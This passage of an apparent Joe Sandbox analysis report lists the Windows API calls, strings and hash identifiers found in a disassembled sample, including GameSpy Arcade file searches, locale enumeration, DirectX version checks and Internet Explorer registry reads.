                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 3541575487-438819550
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040AC64
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040ACB5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040AD05
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: %s\%s$%s\Arcade*.exe$%s\GameSpy
                                                                                                                                              • API String ID: 3541575487-1719408586
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004142A8
                                                                                                                                              • FindClose.KERNEL32(00000000,00000000,?,Found! (FileExists),00000000), ref: 004142D9
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414301
                                                                                                                                              Strings
                                                                                                                                              • Found! (FileExists), xrefs: 004142CB
                                                                                                                                              • FindFirstFile returned INVALID_HANDLE_VALUE, xrefs: 00414323
                                                                                                                                              • File is a directory (FileExists), xrefs: 004142F3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$Close$FileFirst
                                                                                                                                              • String ID: File is a directory (FileExists)$FindFirstFile returned INVALID_HANDLE_VALUE$Found! (FileExists)
                                                                                                                                              • API String ID: 3046750681-696252916
                                                                                                                                              APIs
                                                                                                                                              • _TranslateName.LIBCMT ref: 00430772
                                                                                                                                              • _TranslateName.LIBCMT ref: 004307BB
                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,00000082,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 0043081F
                                                                                                                                              • IsValidLocale.KERNEL32(00000001), ref: 00430835
                                                                                                                                                • Part of subcall function 00430605: EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem
                                                                                                                                              • String ID: Norwegian-Nynorsk
                                                                                                                                              • API String ID: 25477102-461349085
                                                                                                                                              • Opcode ID: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                                              • Instruction ID: 2f20a2206e1c076148d7ff7e681dfdc67b3553f714d7ef80d5f25f58bdb4048b
                                                                                                                                              • Opcode Fuzzy Hash: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                                              • Instruction Fuzzy Hash: 7B4119716112409BD7B0AF619CB1A2F37E0AF49300F156A3FE541963A1E72CB84DCB6E
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424096
                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 004240A7
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004240ED
                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0042412B
                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,0000001C), ref: 00424151
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4136887677-0
                                                                                                                                              • Opcode ID: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                                              • Instruction ID: 3ae70e2e835963f036367eda34e548a546d7b1799bd96947dc5649064c90c0b6
                                                                                                                                              • Opcode Fuzzy Hash: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                                              • Instruction Fuzzy Hash: 7531D476E00229ABDF10CBA4ED499EDBBB8EB45354F540066E901E3241D7348E91CB98
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0042B2C7
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0042B2D3
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0042B2DB
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042B2E3
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0042B2EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                              • Opcode ID: 624e0785466e7938e43d15d0758950ebdaea816835ec01d6f61c555c6e2ae7b9
                                                                                                                                              • Instruction ID: 32fabd2bde9cb4d14f74efbfe84cc1875d2bfc2f5d6faedfeadbc5f05a32322d
                                                                                                                                              • Opcode Fuzzy Hash: 624e0785466e7938e43d15d0758950ebdaea816835ec01d6f61c555c6e2ae7b9
                                                                                                                                              • Instruction Fuzzy Hash: B3F0FF75D002249BCB10EBF4ED0C49EB7F8FF0A345B830961E811E7211DB34A9008A89
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040F740: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0040F924
                                                                                                                                              • CoCreateInstance.OLE32(0044EC20,00000000,00000001,0044EC10,?,00000001,?), ref: 0040F942
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040F9F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$CreateInitializeInstance
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2531819542-0
                                                                                                                                              • Opcode ID: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                                              • Instruction ID: d74481e86e668fc06052e60e2a5e486a87dd0838d2a97d2aabe5d75d40d84abb
                                                                                                                                              • Opcode Fuzzy Hash: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                                              • Instruction Fuzzy Hash: FC3119B5204341AFD724CFA0C888E6BB7A9FFC9700F14896DF9459B291D635EC44CB65
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414FA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$Close$FileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3046750681-0
                                                                                                                                              • Opcode ID: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                                              • Instruction ID: c85bec187cc915339fe74b88054a561c9c391bf97f991d5b0ad1c1012243f531
                                                                                                                                              • Opcode Fuzzy Hash: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                                              • Instruction Fuzzy Hash: CF219070205201CBD7258F15C854BEBB7E9AFC6325F14866DE4098B3A0D339D843CB95
                                                                                                                                              APIs
                                                                                                                                              • LoadResource.KERNEL32(?,?), ref: 004013DC
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004013EB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$LoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1037334470-0
                                                                                                                                              • Opcode ID: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                                              • Instruction ID: 4ddbe79ddf29716ed0e0787d15bd08c75ff9431ae36c8441fcffb4845dcff88c
                                                                                                                                              • Opcode Fuzzy Hash: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                                              • Instruction Fuzzy Hash: 62F0C83770026147CB305F69EC448ABB7D8EAD27A7705083FFD91E3261D238D84496A8
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 004228A6
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004228B8
                                                                                                                                              • GetACP.KERNEL32 ref: 004228E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232894706-0
                                                                                                                                              • Opcode ID: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                                              • Instruction ID: 479ae5959c9c7c33de479cf2c97852b65f57573494026bee3456946d9841ba59
                                                                                                                                              • Opcode Fuzzy Hash: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                                              • Instruction Fuzzy Hash: 1EF0AF31E00234ABC715EBA0E8145EF77A4BB06B41B5142A9E95297250D7B4AE09C799
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                                              • Instruction ID: a4ee6ba57dd3c2eee595af29f84efc58c9f0a8231bf26c2dab4fe45ac8b8fa99
                                                                                                                                              • Opcode Fuzzy Hash: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                                              • Instruction Fuzzy Hash: A7F03131310119BBCF059F61EE049AE7B6CAB01344B848426FD16D5121DBBCCA15DB5E
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(0040B718,?), ref: 00413813
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00413828
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                                              • Instruction ID: 4b0baa7c04ff5837cf594f603c76cd3553f5a9d2e9049aea6c7cfb4a64392fa4
                                                                                                                                              • Opcode Fuzzy Hash: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                                              • Instruction Fuzzy Hash: D6E0C2B94442402BC200EF35D948AEB77D95B52722F049A1AFCA8822E0D23D984DDA2A
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414353
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414368
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                                              • Instruction ID: d18f64121f5c3201ee76a233fb6b76ca38dcc0ed17e5b9cd94885203bfb14983
                                                                                                                                              • Opcode Fuzzy Hash: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                                              • Instruction Fuzzy Hash: 51E0C2B51442442BC2058F34D948AEB77996B82721F048A1ABCB8822E0E23D884DDA3A
                                                                                                                                              APIs
                                                                                                                                              • EnumSystemLocalesA.KERNEL32(00430320,00000001,00000000,?), ref: 004306A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                              • Opcode ID: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                                              • Instruction ID: 54d17df95efd4fea5ab28ce8627b56d0c3c169f5056bfa7745a835ac7e03007b
                                                                                                                                              • Opcode Fuzzy Hash: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                                              • Instruction Fuzzy Hash: 41F03C715713019EDBD0DFB8ED2A7693BE1EB85304F506A3EE841822A5C778649E8B0C
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006), ref: 00432571
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                              • Opcode ID: 4d72925202115b99d5d7b8f4edc631b23003b5100efdd5749bbc6799c76358c4
                                                                                                                                              • Instruction ID: 17f76300287a7d19cbd26b08af8320322d1628fa1681537f1a47a6f7f2395bee
                                                                                                                                              • Opcode Fuzzy Hash: 4d72925202115b99d5d7b8f4edc631b23003b5100efdd5749bbc6799c76358c4
                                                                                                                                              • Instruction Fuzzy Hash: 2EE09231B04208BBCB00EBB4ED01B9D77B8AB04318F1042A6F520D72C0EBB496048B59
                                                                                                                                              APIs
                                                                                                                                              • EnumSystemLocalesA.KERNEL32(0043053A,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430700
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                              • Opcode ID: 4c4d0a780be8e05bee1ffec57aaebf5c88fa93bafd2c860e70af7c595655c8b2
                                                                                                                                              • Instruction ID: f2d345d28478ef9a94cd778bf2c05c4241d0faeb395d53aab50563b5c18227a9
                                                                                                                                              • Opcode Fuzzy Hash: 4c4d0a780be8e05bee1ffec57aaebf5c88fa93bafd2c860e70af7c595655c8b2
                                                                                                                                              • Instruction Fuzzy Hash: 77E09AB25B12409ED7909FB1FC1632D3BD1FB85708F505A3EE440822E6C7782488CB1C
                                                                                                                                              APIs
                                                                                                                                              • EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                              • Opcode ID: 60c3cef7e41813c81970e8aa371923ba75d1669c9be8994eebbc24ba15ed5b1e
                                                                                                                                              • Instruction ID: c519572493f4ad7763061febfb11964ecb3e895afacb9612d552e624a332fddb
                                                                                                                                              • Opcode Fuzzy Hash: 60c3cef7e41813c81970e8aa371923ba75d1669c9be8994eebbc24ba15ed5b1e
                                                                                                                                              • Instruction Fuzzy Hash: 6AD05EB0A603046EE7C08FB0BC597693AE0FF81B14F60AA6ED941810E0C6791889C70C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: FPN8
                                                                                                                                              • API String ID: 0-3045010520
                                                                                                                                              • Opcode ID: edb593c32b61e57108da3a0b80af04005ee91a1e55d6cc48912163f838f1da77
                                                                                                                                              • Instruction ID: 0ae34cf69a8ab284ccd46dc62b6aad79bebef21a7217951b099a750fc97bdae0
                                                                                                                                              • Opcode Fuzzy Hash: edb593c32b61e57108da3a0b80af04005ee91a1e55d6cc48912163f838f1da77
                                                                                                                                              • Instruction Fuzzy Hash: 8561F7A2D082259BF7149B65DC849FB7774EF85310F1440BAD80D672C1E63C6EC5CB66
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @J2G
                                                                                                                                              • API String ID: 0-3264548725
                                                                                                                                              • Opcode ID: 81a836e66e4d380549ba96175722a1bbd639395fd3f17a86fd6a2d2d497a7908
                                                                                                                                              • Instruction ID: 33fde268ea3d09e424a0bc3102b001c06874382390dbdac9628847d6a7409590
                                                                                                                                              • Opcode Fuzzy Hash: 81a836e66e4d380549ba96175722a1bbd639395fd3f17a86fd6a2d2d497a7908
                                                                                                                                              • Instruction Fuzzy Hash: F96154E2C112559BE7148B24DC98AFB7778EF81314F1581FED80AA7680D23C5ED2CA66
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0f4d8db58f026a845213fc1b87d2411c782b3a521c0d40067012ddbee180b44
                                                                                                                                              • Instruction ID: 8118a5aba1bf8fac790b82b1f093b7fb56dd6f0a1e18ac8f50b078235c599629
                                                                                                                                              • Opcode Fuzzy Hash: b0f4d8db58f026a845213fc1b87d2411c782b3a521c0d40067012ddbee180b44
                                                                                                                                              • Instruction Fuzzy Hash: 0A5159B2C042649FEB108B64DC546EB7B74EF46310F1441FAD94DAB282E23C4EC2CB56
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1a8cd5b1783ecb4e5ad5cd15b421a128cdc84403080d857b7d540abd7db69191
                                                                                                                                              • Instruction ID: c6da21f01922a24bbf0247f3c2d5be0c5a260824f1796bbc47ac3f87726a43c0
                                                                                                                                              • Opcode Fuzzy Hash: 1a8cd5b1783ecb4e5ad5cd15b421a128cdc84403080d857b7d540abd7db69191
                                                                                                                                              • Instruction Fuzzy Hash: DC415BF3C106509FF7148A61DC446FB7B79EB41315F1841BAE809E62C2E57C4EC58762
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5142c530960aa0cb64c0203d5831d147cbc78878475bbbd9cee77f603bd720b8
                                                                                                                                              • Instruction ID: 747d1d63339dfe1e000017c3f9986dc234f3fec8d3496a1f1af7502c3cf43142
                                                                                                                                              • Opcode Fuzzy Hash: 5142c530960aa0cb64c0203d5831d147cbc78878475bbbd9cee77f603bd720b8
                                                                                                                                              • Instruction Fuzzy Hash: D6315AF3C142509FF7148AA0DC94AF77BB9EB81314F29417FE849E6282D57C4EC58662
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb3cdc6c5b8b33e03fb0fea420550753fcb1492670a90c7a843143265736801c
                                                                                                                                              • Instruction ID: 1d0873b6c68d4a3a9ea03aa7d0c486147177f922c78f51b52919fd013a03fec0
                                                                                                                                              • Opcode Fuzzy Hash: eb3cdc6c5b8b33e03fb0fea420550753fcb1492670a90c7a843143265736801c
                                                                                                                                              • Instruction Fuzzy Hash: 72318BF3C102509FF7148AA0DC94AF77BB9EB41320F29417BE84DE6282E57C4EC18662
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf73529e59ca414800e33f6a3d27a469329b2531af2a4a51d0323622b91f33b1
                                                                                                                                              • Instruction ID: a48938021cedc7cb95ed12bdda6726682a3cd92a75fd720a002f5d4c608c8565
                                                                                                                                              • Opcode Fuzzy Hash: cf73529e59ca414800e33f6a3d27a469329b2531af2a4a51d0323622b91f33b1
                                                                                                                                              • Instruction Fuzzy Hash: 6331D636A6C4A302D348DE3ADC002737793CBC662AB1DC5B4C684D761AD53FA8439394
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 916adc14e561b3eadea8d50eb96866212fb6a3d63354d9611c4e08656ecd61d3
                                                                                                                                              • Instruction ID: e4babc745da3f29cc0684a555394302970eda1ca2e39a57ede709b7d6887d096
                                                                                                                                              • Opcode Fuzzy Hash: 916adc14e561b3eadea8d50eb96866212fb6a3d63354d9611c4e08656ecd61d3
                                                                                                                                              • Instruction Fuzzy Hash: 0731FB327002149BDB10DF69EC80967BBA5FB84320F85816AED19CB245D735F915C7E1
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?,Version,?,?,80000002,?,?,?,?), ref: 00417198
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 004171A8
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,dsetup.dll,?,?,?,?), ref: 004171C8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$Current$AddressLibraryLoadPathProcSystemTempWindows
                                                                                                                                              • String ID: %d.%d.%d$%d.%d.%d.%d$8.1$CD NEWER THAN HD$CD OLDER THAN HD$CD SAME AS HD$Software\Microsoft\DirectX$UNKNOWN$Version$Windows 2000$Windows XP$dsetup.dll$m_DirectXSetupGetVersion is NULL$oops
                                                                                                                                              • API String ID: 3989195010-3706638769
                                                                                                                                              • Opcode ID: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                                              • Instruction ID: 82d168655b0c159cb1636abc6d3beedafcc5df099369e82530c6fe2580bb6615
                                                                                                                                              • Opcode Fuzzy Hash: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                                              • Instruction Fuzzy Hash: 19A1A07560C380ABE324DB54C840BEBB7F9EBD5711F10491EF985932C1DB78A889CB5A
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Internet Explorer,00000000,00020019,?), ref: 00415C61
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,?), ref: 00415C92
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,IVer,00000000,00000000,?,?), ref: 00415D29
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00415E54
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
